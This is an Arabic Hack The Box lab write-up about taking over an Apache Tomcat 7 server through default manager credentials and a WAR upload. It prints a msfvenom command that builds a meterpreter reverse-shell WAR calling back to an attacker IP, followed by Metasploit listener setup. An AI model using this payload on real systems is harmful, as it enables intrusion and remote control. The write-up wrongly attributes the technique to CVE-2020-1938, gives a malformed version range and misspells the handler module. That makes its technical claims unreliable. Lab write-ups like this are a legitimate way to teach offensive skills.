
شرح خطوة بخطوة لاستغلال CVE-2020-1938 (رفع JSP عشوائي في Apache Tomcat للوصول إلى تنفيذ الأوامر عن بُعد) باستخدام msfvenom و Metasploit في بيئة مختبر Hack The Box.
CVE-2020-1938 هي ثغرة أمنية حرجة تؤثر على Apache Tomcat من الإصدار 9.0.0.M1 إلى 9.0.0.30، ومن 8.5.0 إلى 8.5.50، ومن 7.0.0 إلى 7.0.99 ⚠️ تم استغلال هذه الثغرة في مختبر Hack The Box.
🔗 المرجع: إدخال NIST NVD
يحتوي الموقع على بيانات اعتماد افتراضية لميزة Server Status (حالة الخادم).
تشير هذه الواجهة إلى أن الإصدار هو Apache Tomcat/7.0.88 ببنية 64 بت.
من هذه الواجهة ننتقل إلى سرد التطبيقات التي تعرض ميزة Upload (الرفع) لملفات .war.
عند الرفع بنجاح، يتم تنفيذ ملف .war في المسار /directory/filename
أظهر البحث في إصدار Apache Tomcat تأكيد قابلية التأثر بـ CVE-2020-1938
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
باستخدام msfvenom، وهو مولّد حمولات metasploit، نقوم بتوليد حمولتنا exploit.war.
بعد توليد الملف، ادخل إلى الملف وابحث عن اسم ملف الـ .jsp، مثل gcvxdtmxvw.jsp، واحفظه لاستخدامه لاحقًا.
msfconsole
use exploit/multi/hanlder
Set LHOST 10.10.14.3
Set LPORT 3004
باستخدام msfconsole نقوم بإعداد مستمع (listener) ينتظر تنفيذ حمولتنا.
نقوم برفع ملفنا في قسم النشر (deploy)، وبعد ذلك نقوم بتحديث الشاشة ونجد أن الملف تم رفعه بنجاح. لإكمال الاستغلال، يجب أن ننتقل إلى المسار ip/hacked/gcvxdtmxvw.jsp.
هذا يجعل الطلب معلقًا، ومع ذلك نتمكن من رؤية محليًا على جهازنا أن لدينا اتصالًا عكسيًا.